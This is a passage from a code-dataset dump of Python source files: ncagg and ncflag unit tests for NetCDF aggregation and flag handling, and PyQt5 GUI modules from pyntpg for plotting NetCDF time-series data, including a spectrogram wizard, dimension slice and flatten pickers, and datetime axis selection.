a = SampleConfig([{"name": "a", "something": 1}, {"name": "z", "something": 1}])
a.update({"b": {"something": 2}})
self.assertEqual(len(a), 3)
with self.assertRaises(ValueError):
a.update({"b": {"something": "noooo"}})
class TestDimVarAttrConfigs(unittest.TestCase):
def test_dimension_config(self):
""" Test that the DimensionConfig object behaves as expected. """
dc = DimensionConfig([{"name": "a", "size": 5}])
self.assertIn("a", dc.keys())
self.assertEqual(dc["a"]["size"], 5)
self.assertTrue(dc["a"]["index_by"] is None)
dc["b"] = {"size": None, "index_by": "c"}
self.assertIn("b", dc.keys())
self.assertTrue(dc["b"]["size"] is None)
self.assertEqual(dc["b"]["index_by"], "c")
# TODO: test Vars, and GlobalAttrs
class TestOverallConfig(unittest.TestCase):
def test_basic(self):
""" Make sure the configuration accepts a valid configuration. """
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["b"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
Config(dims, vars, attrs)
def test_basic_with_var_attrs(self):
""" Make sure the configuration accepts a valid configuration. """
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{
"name": "t",
"dimensions": ["b"],
"datatype": "float32",
"attributes": {"_FillValue": 0},
},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
Config(dims, vars, attrs)
def test_missing_dim(self):
""" The variable t depends on a dimension c that has not been configured.
Make sure a ValueError is raised because of this."""
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["c"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
with self.assertRaises(ValueError):
Config(dims, vars, attrs)
def test_extra_dim(self):
"""We have configured an extra dimension z that isn't used by any variables.
Make sure a ValueError is raised. """
dims = DimensionConfig(
[
{"name": "a", "size": 2},
{"name": "b", "size": None},
{"name": "z", "size": None},
]
)
vars = VariableConfig(
[
{"name": "t", "dimensions": ["a"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
with self.assertRaises(ValueError):
Config(dims, vars, attrs)
def test_to_json(self):
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["b"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
json = Config(dims, vars, attrs).to_dict()
```
#### File: test/generic/test_multi_unlim_dims.py
```python
import unittest
import numpy as np
import netCDF4 as nc
from ncagg.config import Config
from ncagg.aggregator import generate_aggregation_list, evaluate_aggregation_list
import os
import tempfile
class TestMultiUnlimDims(unittest.TestCase):
def setUp(self):
np.random.seed(
2
) # don't want test results to potentially change based on random
_, self.filename = tempfile.mkstemp()
# since files sorted by name with no UDC, prefix tmp file so ordering
# will be deterministic
self.inputs = [tempfile.mkstemp(prefix=str(_))[1] for _ in range(3)]
for i, inp in enumerate(self.inputs):
with nc.Dataset(inp, "w") as nc_in: # type: nc.Dataset
nc_in.createDimension("a", None)
nc_in.createDimension("b", None)
nc_in.createVariable("a", np.int32, ("a",))
nc_in.createVariable("b", str, ("b",))
nc_in.createVariable("c", np.int32, ("a", "b"))
                # the variable a is just [0, 1, 2] + i * 3 such that, when aggregated,
# we can verify that in the dimension "a", the aggregated variable a
# contains a = 0, 1, 2 ... (3*3)
nc_in.variables["a"][:] = np.arange(3) + (i * 3)
# recall i is the ith input file we're creating...
# then variable b has i elements, being some random selection of "a", "b", and "c"
# I.e. the first file has only one element, next has two, etc. impl by the [:i+1]
# the variable c also has i _columns_.
# for j, b in enumerate(sorted(["a", "b", "c"], key=lambda x: np.random.rand())[:i+1]):
# actually, since we don't have the flatten with index_by working yet,
# instead keep in order...
for j, b in enumerate(["a", "b", "c"][: i + 1]):
nc_in.variables["b"][j] = b
nc_in.variables["c"][:, j] = np.arange(3) + (i * 3)
def tearDown(self):
os.remove(self.filename)
[os.remove(f) for f in self.inputs]
def test_default_multi_dim(self):
config = Config.from_nc(self.inputs[0])
l = generate_aggregation_list(config, self.inputs)
evaluate_aggregation_list(config, l, self.filename)
with nc.Dataset(self.filename) as nc_out: # type: nc.Dataset
            # this is the default result produced by aggregating
            # along both unlimited dimensions. This isn't really practically
            # useful, but by our "basic" definition of aggregation along unlimited
            # dimensions it is correct. Need to make sure we get what's expected.
# [[0 -- -- -- -- --]
# [1 -- -- -- -- --]
# [2 -- -- -- -- --]
# [-- 3 3 -- -- --]
# [-- 4 4 -- -- --]
# [-- 5 5 -- -- --]
# [-- -- -- 6 6 6]
# [-- -- -- 7 7 7]
# [-- -- -- 8 8 8]]
c = nc_out.variables["c"][:]
self.assertEqual(c.shape, (9, 6))
self.assertEqual(np.sum(c), 90)
self.assertEqual(np.ma.count_masked(c), 36)
def test_collapse_second_dim(self):
config = Config.from_nc(self.inputs[0])
config.dims["b"].update({"flatten": True, "index_by": "b"})
l = generate_aggregation_list(config, self.inputs)
evaluate_aggregation_list(config, l, self.filename)
with nc.Dataset(self.filename) as nc_out: # type: nc.Dataset
# This is the more practically useful method of aggregation,
# where, for example, the dimension "a" might represent time
# and dim "b" is maybe satellite, or event, etc. (something that,
# at any point in time, there could be an arbitrary number of).
# flatten b dimension, should turn out like:
# [[0 -- --]
# [1 -- --]
# [2 -- --]
# [3 3 --]
# [4 4 --]
# [5 5 --]
# [6 6 6]
# [7 7 7]
# [8 8 8]]
c = nc_out.variables["c"][:]
self.assertEqual(c.shape, (9, 3))
self.assertEqual(np.sum(c), 90)
self.assertEqual(np.ma.count_masked(c), 9)
for i, a in enumerate(["a", "b", "c"]):
self.assertEqual(nc_out.variables["b"][i], a)
``` |
{
"source": "5tefan/ncflag",
"score": 3
} |
#### File: ncflag/test/test_misc_api.py
```python
from ncflag import FlagWrap
from unittest import TestCase
import numpy as np
class TestApi(TestCase):
def test_valid_meaning(self):
flags = np.array([0, 0, 1, 2, 3], dtype=np.ubyte)
flag_meanings = "good medium bad extra_bad"
flag_values = np.array([0, 1, 2, 3])
f = FlagWrap(flags, flag_meanings, flag_values)
for flag_meaning in flag_meanings.split():
self.assertTrue(f.is_valid_meaning(flag_meaning))
for not_a_meaning in ["test", "not", "valid", "good1", "extra"]:
self.assertFalse(f.is_valid_meaning(not_a_meaning))
``` |
{
"source": "5tefan/py-netcdf-timeseries-gui",
"score": 2
} |
#### File: analysis/spectrogram/spectrogram.py
```python
from PyQt5.QtWidgets import QWizard, QWidget, QHBoxLayout, QFormLayout, QSpinBox, QComboBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from pyntpg.analysis.discrete_fourier_transform.discrete_fourier_transform import ChooseParameters
from pyntpg.analysis.preview_result import PreviewResult
from pyntpg.analysis.spectrogram.spectro_window import SpectroWindow
class Spectrogram(QWizard):
def __init__(self):
super(Spectrogram, self).__init__()
self.page1 = ChooseSpectroParameters()
self.page2 = PreviewSpectroResult()
self.addPage(self.page1)
self.addPage(self.page2)
self.button(QWizard.NextButton).clicked.connect(lambda _: self.page2.do_calculation(self.calculate))
def calculate(self):
from scipy.signal import spectrogram
frequency, oslice = self.page1.choose_frequency.get_frequency_and_slice()
args = self.page1.get_arguments_for_spectrogram()
values = self.page1.choose_signal.get_data(oslice)
f, t, Sxx = spectrogram(values, frequency, **args)
return t, f, Sxx
class ChooseSpectroParameters(ChooseParameters):
def __init__(self):
super(ChooseSpectroParameters, self).__init__()
# Add all the other parameters for a spectrogram
options = QWidget()
options_layout = QHBoxLayout()
options.setLayout(options_layout)
self.layout.addWidget(options)
# Add the window type chooser
self.choose_window = SpectroWindow()
options_layout.addWidget(self.choose_window)
# make a new form layout for nperseg and lenstep
secondformcol = QWidget()
secondformcollayout = QFormLayout()
secondformcol.setLayout(secondformcollayout)
# Choose nperseg
self.choose_nperseg = QSpinBox()
self.choose_nperseg.setMinimum(3)
        self.choose_nperseg.setMaximum(256)  # default taken from scipy.signal.spectrogram
self.choose_nperseg.setValue(256)
# self.choose_signal.y_picked.connect(lambda n: self.choose_nperseg.setMaximum(n))
secondformcollayout.addRow("nperseg", self.choose_nperseg)
# choose lenstep
self.choose_lenstep = QSpinBox()
self.choose_lenstep.setMinimum(1)
self.choose_lenstep.setMaximum(256)
        self.choose_lenstep.setValue(256 // 8)  # default taken from scipy.signal.spectrogram; QSpinBox needs an int
# self.choose_signal.y_picked.connect(lambda n: self.choose_lenstep.setMaximum(n))
secondformcollayout.addRow("lenstep", self.choose_lenstep)
# coerce choose_signal to emit len b/c we probably missed it
# during this initialization
self.choose_signal.emit_y_picked()
options_layout.addWidget(secondformcol)
# make the third column for the remaining spectrogram params
thirdformcol = QWidget()
thirdformcollayout = QFormLayout()
thirdformcol.setLayout(thirdformcollayout)
# choose detrend
self.choose_detrend = QComboBox()
self.choose_detrend.addItems(["constant", "linear", "none"])
thirdformcollayout.addRow("detrend", self.choose_detrend)
# choose scaling
self.choose_scaling = QComboBox()
self.choose_scaling.addItems(["density", "spectrum"])
thirdformcollayout.addRow("scaling", self.choose_scaling)
options_layout.addWidget(thirdformcol)
def get_arguments_for_spectrogram(self):
"""
Get a dict of arguments for the spectrogram function.
See http://docs.scipy.org/doc/scipy-0.17.0/reference/generated/scipy.signal.spectrogram.html
:rtype: dict
:return: a dictionary of options for scipy.signal.spectrogram
"""
nperseg = self.choose_nperseg.value()
noverlap = nperseg - self.choose_lenstep.value()
window = self.choose_window.get_window()
scaling = str(self.choose_scaling.currentText())
        detrend = str(self.choose_detrend.currentText())
        if detrend == "none":
            # scipy.signal.spectrogram expects detrend=False (not the string "none") to disable detrending
            detrend = False
return {
"nperseg": nperseg,
"noverlap": noverlap,
"window": window,
"scaling": scaling,
"detrend": detrend
}
class PreviewSpectroResult(PreviewResult):
"""
Subclass PreviewResult to implement make_plot
specific to displaying a Spectrogram in a
pcolormesh.
"""
def __init__(self):
super(PreviewSpectroResult, self).__init__()
def make_plot(self, result):
"""
Display the spectrogram.
:param result: result of Spectrogram.calculate function
:return: None
"""
# create the figure
figure = Figure(tight_layout=True)
ax = figure.add_subplot(1, 1, 1)
ax.pcolormesh(*result, rasterized=True)
canvas = FigureCanvas(figure)
toolbar = NavigationToolbar(canvas, self)
self.result_display_layout.addWidget(canvas)
self.result_display_layout.addWidget(toolbar)
```
#### File: pyntpg/dataset_var_picker/flat_dataset_var_picker.py
```python
from collections import OrderedDict
import numpy as np
from PyQt5.QtCore import QCoreApplication, pyqtSlot, pyqtSignal, QMutex
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QSpinBox, QLabel, QCheckBox
from PyQt5.QtWidgets import QFormLayout
from pyntpg.clear_layout import clear_layout
from pyntpg.dataset_var_picker.dataset_var_picker import DatasetVarPicker, CONSOLE_TEXT
from pyntpg.horizontal_pair import HorizontalPair
from pyntpg.vertical_scroll_area import VerticalScrollArea
class SliceContainer(QWidget):
sig_slicechange = pyqtSignal(list) # list of slices that the user has selected
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices
def __init__(self, *args, **kwargs):
super(SliceContainer, self).__init__(*args, **kwargs)
self.layout = QFormLayout()
self.layout.setRowWrapPolicy(QFormLayout.WrapAllRows)
self.setLayout(self.layout)
self.layout.setContentsMargins(0, 0, 0, 0)
self.slice_change_mutex = QMutex()
self.spinboxes = OrderedDict()
@pyqtSlot(OrderedDict)
def configure_dimensions(self, dims):
assert isinstance(dims, OrderedDict)
# clear anything that was previously here
clear_layout(self.layout)
self.spinboxes = OrderedDict()
if len(dims) <= 1:
slice_specification = OrderedDict(
[(k, (slice(0, v), False)) for k, v in dims.items()]
)
self.sig_slices.emit(slice_specification)
return
dict_items = dims.items()
for i, (dim, size) in enumerate(dict_items):
# create dim spinboxes and add them to layout
begin_spinbox = QSpinBox()
begin_spinbox.setObjectName("%s:begin" % dim)
begin_spinbox.setRange(0, size-1)
end_spinbox = QSpinBox()
end_spinbox.setObjectName("%s:end" % dim )
end_spinbox.setRange(1, size)
if i == len(dict_items) - 1: # if it's the last dimension take only 1
end_spinbox.setValue(1)
else: # otherwise take them all
end_spinbox.setValue(size)
colon = QLabel(":")
colon.setMaximumWidth(5)
dim_title = QLabel("%s: " % dim)
checkbox_flatten = QCheckBox("Flatten?", self)
            checkbox_flatten.setChecked(False)  # start unchecked; flattening is opt-in per dimension
# Can't flatten the first dimension, so setting first one not enabled.
# keeping the box though to keep the layout consistent.
checkbox_flatten.setEnabled(i > 0)
row = HorizontalPair(begin_spinbox, colon, end_spinbox, checkbox_flatten)
checkbox_flatten.stateChanged.connect(self.slice_changed)
self.layout.addRow(dim_title, row)
begin_spinbox.valueChanged.connect(self.slice_changed)
end_spinbox.valueChanged.connect(self.slice_changed)
self.spinboxes[dim] = [begin_spinbox, end_spinbox, checkbox_flatten]
self.emit_slices()
@pyqtSlot(int)
def slice_changed(self, x):
# mutex protected otherwise this slot will potentially fire multiple times
# responding to programmatic changing of the spin boxes.
if self.slice_change_mutex.tryLock():
spinbox = self.sender()
name = spinbox.objectName()
if "begin" in name:
# end must be at least start + 1
# if begin changed, make sure end is being+1 or greater
try:
dim = name.split(":")[0]
end_spinbox = self.spinboxes[dim][1]
if end_spinbox.value() <= x:
end_spinbox.setValue(x+1)
except KeyError:
pass
elif "end" in name:
# end must be at least start + 1
# if end changed, make sure begin is less than end
try:
dim = name.split(":")[0]
begin_spinbox = self.spinboxes[dim][0]
if begin_spinbox.value() >= x:
begin_spinbox.setValue(x-1)
except KeyError:
pass
self.emit_slices()
self.slice_change_mutex.unlock()
def emit_slices(self):
slice_specification = OrderedDict()
for dim, (begin, end, flatten) in self.spinboxes.items():
flatten_condition = flatten is not None and flatten.isChecked()
slice_specification[dim] = (slice(begin.value(), end.value()), flatten_condition)
self.sig_slices.emit(slice_specification)
# TODO: combine these two classes
class DimensionFlattenPicker(QWidget):
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices, pass through from SliceContainer
def __init__(self, *args, **kwargs):
super(DimensionFlattenPicker, self).__init__(*args, **kwargs)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self.layout.setContentsMargins(0, 0, 0, 0)
self.datasets = QCoreApplication.instance().datasets
self.ipython = QCoreApplication.instance().ipython
self.slice_container = SliceContainer()
self.slice_container.setMinimumHeight(self.slice_container.minimumSizeHint().height())
self.layout.addWidget(VerticalScrollArea(self.slice_container))
self.slice_container.sig_slices.connect(self.accept_slice_selection)
self.slices = OrderedDict()
self.shape = ()
@pyqtSlot(str, str)
def variable_changed(self, dataset, variable):
if dataset == CONSOLE_TEXT:
shape = np.shape(self.ipython.get_var_value(variable))
names = np.arange(len(shape))
else:
shape = np.shape(self.datasets.datasets[dataset].variables[variable])
names = self.datasets.datasets[dataset].variables[variable].dimensions
self.shape = shape
enable_slicing = len(shape) > 1
self.slice_container.setEnabled(enable_slicing)
self.slice_container.configure_dimensions(OrderedDict(zip(names, shape)))
@pyqtSlot(OrderedDict)
def accept_slice_selection(self, slices=OrderedDict()):
self.slices = slices
self.sig_slices.emit(slices)
class FlatDatasetVarPicker(DatasetVarPicker):
sig_anticipated_length = pyqtSignal(int) # anticipated size along x dimension
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices, pass through from SliceContainer
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
super(FlatDatasetVarPicker, self).__init__(*args, **kwargs)
# inheriting self.layout instance of QVboxLayout
self.layout.setContentsMargins(0, 0, 0, 0)
self.flattener = DimensionFlattenPicker()
self.layout.addWidget(self.flattener)
self.slices = OrderedDict() # hold the slices user selects, use in get_data.
self.anticipated_length = None
self.flattener.sig_slices.connect(self.accept_slice_selection)
self.flattener.sig_slices.connect(self.sig_slices)
self.variable_widget.currentIndexChanged[str].connect(self.check_dims)
@pyqtSlot(str)
def check_dims(self, variable):
dataset = self.dataset_widget.currentText()
if dataset and variable:
self.flattener.variable_changed(dataset, variable)
@pyqtSlot(OrderedDict)
def accept_slice_selection(self, slices=OrderedDict()):
self.slices = slices
reshaping = self.get_reshape(self.slices)
# reshaping should be either length 1 or 2 because the output needs to be 1D or 2D for matplotlib.
# If 1D, the length is obviously just the length. If 2D however, assume that the first dimension is
# the length (x-axis) and the second dimension will be multiple sets of y values along that axis.
# So, in order to facilitate the user matching the x axis up with the times on the x-axis selector,
# use the first dimension as anticipated length.
self.anticipated_length = reshaping[0]
self.sig_anticipated_length.emit(self.anticipated_length)
@staticmethod
def get_reshape(slice_specification):
"""
A slice_specification is an OrderedDict that the user fills out by specifying slice and flattening selections
for each dimension of the the data selected.
In order to actually convert the data from original multidim format into the flattened selection,
we will need to call numpy reshape with arguments.... this function determines those arguments.
:param slice_specification: OrderedDict[slice, bool]
:return: list[int]
"""
reshaping = []
for i, (the_slice, flatten_condition) in enumerate(slice_specification.values()):
dim_len = the_slice.stop - the_slice.start
if i == 0:
# the first dimension has to just be taken, since there's nothing behind to flatten against.
reshaping.append(dim_len)
elif flatten_condition or dim_len == 1:
# otherwise flatten.
# things are either explicitly marked to flatten, or if only size 1
# are flattened.
reshaping[-1] = reshaping[-1] * dim_len
else:
reshaping.append(dim_len)
return reshaping
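    # Worked example (illustrative): for a slice_specification of
    #   OrderedDict([("time", (slice(0, 10), False)), ("channel", (slice(0, 4), True))])
    # the first dimension contributes 10 and the second is flattened into it (10 * 4),
    # so get_reshape returns [40]; without the flatten flag it would return [10, 4].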
def get_data(self, _=None):
dataset, variable = self.selected()
oslices = [v[0] for v in self.slices.values()]
data = QCoreApplication.instance().get_data(dataset, variable, oslice=oslices)
reshaping = self.get_reshape(self.slices)
        assert len(reshaping) <= len(data.shape), "Reshaping must not have more dims than data, " \
                                                  "but found reshape {} vs {}".format(reshaping, data.shape)
return data.reshape(tuple(reshaping))
def get_config(self):
default = super(FlatDatasetVarPicker, self).get_config()
        # to the default, add labels for each of the dimensions
# in the plot, we want to have labels like "var(dim1=0, dim2=1)" as an example,
# where, if it's a 2D plot, dim2 would range from y to z depending on what
# is selected here in the slice_specification (self.slices).
dim_labels = {}
# ... TODO
return default
```
#### File: dataset_var_picker/x_picker/datetime_picker.py
```python
from collections import OrderedDict
from datetime import datetime, timedelta
import netCDF4 as nc
import numpy as np
from PyQt5.QtCore import pyqtSignal, pyqtSlot, QMutex
from PyQt5.QtWidgets import QWidget, QDateTimeEdit, QFormLayout
try:
# for netCDF4 versions before 1.4.0
from netCDF4._netCDF4 import _dateparse
except ImportError:
# netcdf4 version 1.4.0 removes netcdftime to a separate package "cftime"
from cftime._cftime import _dateparse
from pyntpg.dataset_var_picker.dataset_var_picker import CONSOLE_TEXT
from pyntpg.dataset_var_picker.dataset_var_picker import DatasetVarPicker
try:
from cftime import DatetimeGregorian
datetime_types = (datetime, DatetimeGregorian)
except ImportError:
# fallback compat if cftime < 1.2.0 installed.
datetime_types = (datetime,)
def datetime_units(units):
""" Detect if the str units is a parsable datetime units format. """
try:
try:
_dateparse(units)
return True
except TypeError:
            # CASE: cftime > 1.2.0, the signature changed and it
            # needs to be called with the calendar "standard" arg.
            # unfortunately inspect.getfullargspec doesn't work
            # on builtin functions (which _dateparse is, b/c it's
            # in C), so we can't do this more elegantly by inspection.
_dateparse(units, "standard")
return True
except (AttributeError, ValueError):
return False
class DatetimePicker(DatasetVarPicker):
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
self.slices = OrderedDict()
self.target_len = None
super(DatetimePicker, self).__init__(*args, **kwargs)
self.date_range_container = QWidget()
self.date_range_layout = QFormLayout()
self.date_range_container.setLayout(self.date_range_layout)
self.layout.addWidget(self.date_range_container)
# create the date slice widgets
self.start_time = QDateTimeEdit()
self.start_time.setDisplayFormat("yyyy-MM-dd hh:mm:ss")
self.date_range_layout.addRow("start", self.start_time)
self.end_time = QDateTimeEdit()
self.end_time.setDisplayFormat("yyyy-MM-dd hh:mm:ss")
self.date_range_layout.addRow("end", self.end_time)
# a mutex to prevent programatic changes from being registered as user inputs
self.datetime_change_mutex = QMutex()
self.datetime_user_modified = False
self.start_time.dateTimeChanged.connect(self.accept_datetime_change)
self.end_time.dateTimeChanged.connect(self.accept_datetime_change)
self.variable_widget.currentIndexChanged[str].connect(self.variable_selected)
@pyqtSlot()
def accept_datetime_change(self):
if self.datetime_change_mutex.tryLock(): # MAKE SURE TO UNLOCK
self.datetime_user_modified = True
            self.datetime_change_mutex.unlock()  # MADE SURE TO UNLOCK
@pyqtSlot(int)
def accept_target_len(self, val):
self.target_len = val
@pyqtSlot(OrderedDict)
def accept_slices(self, slices):
self.slices = slices
self.dataset_selected(self.dataset_widget.currentText())
@pyqtSlot(str)
def variable_selected(self, variable):
""" Once variable selected, must set the min and max datetimes. """
dataset = self.dataset_widget.currentText()
if not dataset or not variable:
return # don't follow through for changed to nothing
num_dims = len(self.get_original_shape(dataset, variable))
# This is going to get funky....
# 1. Assume that the start and end are the min and max values.... in other words, assume
# that the time array is in order and sorted.
bounds = super(DatetimePicker, self).get_data(oslice=[[0, -1] for _ in range(num_dims)])
# 2. If either of the bound are masked, take the hit and read the whole thing and calculate min max.
if np.ma.count_masked(bounds) > 0:
full_data = super(DatetimePicker, self).get_data()
bounds = np.array([np.nanmin(full_data), np.nanmax(full_data)])
if not isinstance(bounds.item(0), datetime_types):
value = self.get_value()
# must have units if not already datetime because of show_var condition
bounds = nc.num2date(bounds, value.units)
# super annoying... cftime 1.2.0 returns a custom type that does not
        # inherit from datetime, so it basically can't be passed to ANYTHING
# that expects plain old datetimes anymore.... so, roundabout conversion
# to ensure we have a datetime object. This will work for pre cftime 1.2.0
        # returning native datetime since datetime has an isoformat method as well.
start = datetime.fromisoformat(bounds.item(0).isoformat())
end = datetime.fromisoformat(bounds.item(-1).isoformat())
if start is None or end is None:
self.signal_status_message.emit(
"Error: fill in time array bound for dataset {}, var {}. Cannot use.".format(dataset, variable)
)
return # also abort here... don't follow through
# must grab the original values before setting the range because setting the
# range will set the value to start or range if it's outside of range when changed.
original_start_dt = self.start_time.dateTime().toPyDateTime()
original_end_dt = self.end_time.dateTime().toPyDateTime()
self.datetime_change_mutex.lock() # A LOCK!!!! ENSURE UNLOCK.
self.start_time.setDateTimeRange(start, end)
self.end_time.setDateTimeRange(start, end)
# smc@20181217 keep original user modified dates if they are valid.
# emphasis on user modified! That's why new listeners required.
# only set the times to the bounds if the original datetimes were not in the range.
        if original_start_dt < start or original_end_dt > end or not self.datetime_user_modified:
self.start_time.setDateTime(start)
if original_end_dt > end or original_end_dt < start or not self.datetime_user_modified:
self.end_time.setDateTime(end)
self.datetime_change_mutex.unlock()
def show_var_condition(self, dataset, variable):
if not super(DatetimePicker, self).show_var_condition(dataset, variable):
return False
dimensions = self.get_dimensions(dataset, variable)
if not set(list(dimensions.keys())).issubset(list(self.slices.keys())):
return False
if not np.prod(list(dimensions.values())) == self.target_len:
return False
value = self.get_value(dataset, variable)
if dataset == CONSOLE_TEXT:
return ((hasattr(value, "units") and datetime_units(value.units))
or isinstance(np.array(value).item(0), datetime_types))
else:
# separate these out so don't try to read from the netcdf here.
return hasattr(value, "units") and datetime_units(value.units)
def get_data(self, _=None):
num_dims = len(self.get_original_shape())
oslices = [v[0] for v in self.slices.values()]
data = super(DatetimePicker, self).get_data(oslice=oslices[:num_dims])
mask = np.ma.getmaskarray(data) # hopefully none!
if not isinstance(data.item(0), datetime_types):
# not datetime already, convert through num2date
# by assumption value has a units attribute since
# show_var_condition, would not allow the variable to be displayed
# unless it was already a datetime or had num2date parseable units field
value = self.get_value()
data = nc.num2date(data, value.units)
if len(self.slices) > 1:
data = data.flatten()
mask = mask.flatten()
start_bound_dt = self.start_time.dateTime().toPyDateTime()
end_bound_dt = self.end_time.dateTime().toPyDateTime()
if np.any(mask):
# if any data values are masked, must go through and remove the Nones from the data array...
# the None values are introduced by the nc.num2date call on masked elements
mask_date_detector = np.vectorize(lambda x: x is None or x < start_bound_dt or x > end_bound_dt)
return np.ma.masked_where(mask_date_detector(data), data)
else:
# otherwise, this approach seems to be much more efficient.
return np.ma.masked_where((data < start_bound_dt) | (data > end_bound_dt), data)
def get_config(self):
default = super(DatetimePicker, self).get_config()
default.update({"type": "datetime"})
return default
```
#### File: dataset_var_picker/x_picker/x_picker.py
```python
from collections import OrderedDict
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QLabel, QStackedWidget
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtWidgets import QWidget, QComboBox
from pyntpg.dataset_var_picker.x_picker.datetime_picker import DatetimePicker
from pyntpg.dataset_var_picker.x_picker.index_picker import IndexPicker
from pyntpg.dataset_var_picker.x_picker.scatter_picker import ScatterPicker
from pyntpg.horizontal_pair import HorizontalFormPair
class XPicker(QWidget):
""" This is a custom implementation of a dataset and var picker
intended for the panel configurer to pick the x axis after the
y axis has been selected.
Support three different types of axes to be chosen,
index, datetime, and scatter.
index plots the data selected for the y axis vs index in array.
datetime plots y axis data vs datetime selected for a datetime variable.
scatter allows the x axis to be an arbitrary variable of the same length.
"""
"""
Upper half: choose axis type: combobox.
Bottom half: specific details according to axis type chosen above.
"""
sig_target_length = pyqtSignal(int)
sig_slices = pyqtSignal(OrderedDict)
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
title = kwargs.pop("title", "x-axis")
super(XPicker, self).__init__(*args, **kwargs)
self.layout = QVBoxLayout()
self.layout.setContentsMargins(0, 0, 5, 0)
self.setLayout(self.layout)
if title is not None:
self.layout.addWidget(QLabel(title))
self.types = OrderedDict([
("index", IndexPicker),
("datetime", DatetimePicker),
("scatter", ScatterPicker)
])
# create the toggle widget between axes types
self.toggle_type = QComboBox()
self.toggle_type.setMaximumWidth(200)
self.toggle_type.addItems(self.types.keys())
# self.toggle_type.activated.connect(self.type_dispatcher)
self.layout.addWidget(HorizontalFormPair("type", self.toggle_type))
self.widget_stack = QStackedWidget()
for each in self.types.values():
instance = each()
if hasattr(instance, "accept_target_len"):
self.sig_target_length.connect(instance.accept_target_len)
if hasattr(instance, "accept_slices"):
self.sig_slices.connect(instance.accept_slices)
if hasattr(instance, "signal_status_message"):
# if the component has a signal_status_message attribute, hook it to
# self so that it can be propagated up to the plot tab and displayed.
self.signal_status_message.connect(instance.signal_status_message)
self.widget_stack.addWidget(instance)
self.layout.addWidget(self.widget_stack)
# set the widget on top of the stack based on what's selected in the combobox
self.toggle_type.activated[int].connect(self.widget_stack.setCurrentIndex)
def get_config(self):
widget = self.widget_stack.currentWidget()
return widget.get_config() # delegate delegate delegate
#
# def get_config(self):
# """ Calling self.get_config will collect all the options
# configured through the UI into a dict for plotting.
# :return: dict configuration object specifying x-axis
# """
# dataset = str(self.dataset_widget.currentText())
# variable = str(self.variable_widget.currentText())
# axis_type = self.get_type()
# result = {
# "type": axis_type,
# "xdataset": dataset,
# "xvariable": variable,
# "xdata": self.get_data()
# }
# ncvar = self.get_ncvar()
# if hasattr(ncvar, "units") and axis_type != "datetime":
# result.update({"xunits": ncvar.units})
# return result
#
# if __name__ == "__main__":
# import sys
# from PyQt5.QtWidgets import QApplication
# app = QApplication(sys.argv)
# main = XPicker()
# main.show()
# exit(app.exec_())
```
#### File: pyntpg/plot_tabs/layout_picker.py
```python
from __future__ import print_function
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QFrame, QHBoxLayout
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QSplitter, QSpinBox, QDialogButtonBox, QFormLayout, QDialog
# TODO: for the output function, make it so that all panels are an increment of 1/n where n is the number of panels
DEFAULT_LAYOUT = (1, 2) # number cols, number rows
class LayoutPicker(QWidget):
""" The LayoutPicker class creates a widget of numbered rectangles
formed by movable sliders from which a user can very flexibly, but
visually choose how subplots in their graph should look and be laid out.
The implementation creates horizontal sliders first and populates each
with vertical sliders. The effect of this is that rows are cohesive but
each row has independent columns. I chose rows because time series are
generally horizontal. A column first implementation would be easy to adapt.
"""
def __init__(self):
""" Initialize the widget with layout, give label, and create
the sliders.
:return: None
"""
QWidget.__init__(self)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
title = QLabel("Panel Layout")
self.layout.addWidget(title)
self.visible_widgets = []
self.widgets = []
self.vcount = 0 # number of rows
self.hcount = 0 # number of cols
self.vsplitter = None
self.make_splitters(*DEFAULT_LAYOUT)
def make_splitters(self, height, width):
# some variables we are going to need to keep track of everything
self.visible_widgets = []
self.widgets = []
self.vcount = width # number of rows
self.hcount = height # number of cols
try:
self.vsplitter.deleteLater()
except AttributeError:
pass
self.vsplitter = QSplitter(Qt.Vertical)
self.vsplitter.setHandleWidth(2)
self.vsplitter.setStyleSheet("QSplitter::handle {border: 1px solid white; background: black; }")
for i in range(self.vcount):
hsplitter = QSplitter(Qt.Horizontal)
hsplitter.setHandleWidth(2)
for j in range(self.hcount):
widget = QFrame()
self.widgets.append(widget)
self.visible_widgets.append(widget)
widget.setFrameShape(QFrame.StyledPanel)
widget.setLayout(QHBoxLayout())
# initialize the label. Label text will be changed through indirect references
widget.layout().addWidget(QLabel("%s" % self.visible_widgets.index(widget)))
hsplitter.addWidget(widget)
self.vsplitter.addWidget(hsplitter)
# connect splitterMoved after widgets added so things dont fire during setup
hsplitter.splitterMoved.connect(self.recalculate_visible_horizontal)
self.vsplitter.splitterMoved.connect(self.recalculate_visible_vertical)
self.layout.addWidget(self.vsplitter)
